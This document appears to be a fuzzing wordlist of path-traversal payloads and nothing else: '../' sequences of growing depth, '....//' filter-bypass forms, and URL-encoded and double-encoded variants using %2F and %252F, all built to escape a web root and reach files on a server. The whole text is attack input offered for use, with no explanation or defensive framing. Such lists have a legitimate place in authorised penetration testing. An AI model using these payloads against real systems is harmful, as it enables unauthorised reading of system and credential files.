../
/../
../../
/../../
../../../
/../../../
../../../../
/../../../../
../../../../../
/../../../../../

....//
//....//
....//....//
//....//....//
....//....//....//
//....//....//....//
....//....//....//....//
//....//....//....//....//
....//....//....//....//....//
//....//....//....//....//....//

..%2F
%2F..%2F
..%2F..%2F
%2F..%2F..%2F
..%2F..%2F..%2F
%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F
%2F..%2F..%2F..%2F..%2F
..%2F..%2F..%2F..%2F..%2F
%2F..%2F..%2F..%2F..%2F..%2F

....%2F%2F
%2F%2F....%2F%2F
....%2F%2F....%2F%2F
%2F%2F....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F
%2F%2F....%2F%2F....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F....%2F%2F
%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F
....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F
%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F

..%252F
%252F..%252F
..%252F..%252F
%252F..%252F..%252F
..%252F..%252F..%252F
%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F
%252F..%252F..%252F..%252F..%252F
..%252F..%252F..%252F..%252F..%252F
%252F..%252F..%252F..%252F..%252F..%252F

....%252F%252F
%252F%252F....%252F%252F
....%252F%252F....%252F%252F
%252F%252F....%252F%252F....%252F%252F
....%252F%252F....%252F%252F....%252F%252F
%252F%252F....%252F%252F....%252F%252F....%252F%252F
....%252F%252F....%252F%252F....%252F%252F....%252F%252F
%252F%252F....%252F%252F....%252F%252F....%252F%252F....%252F%252F
....%252F%252F....%252F%252F....%252F%252F....%252F%252F....%252F%252F
%252F%252F....%252F%252F....%252F%252F....%252F%252F....%252F%252F....%252F%252F
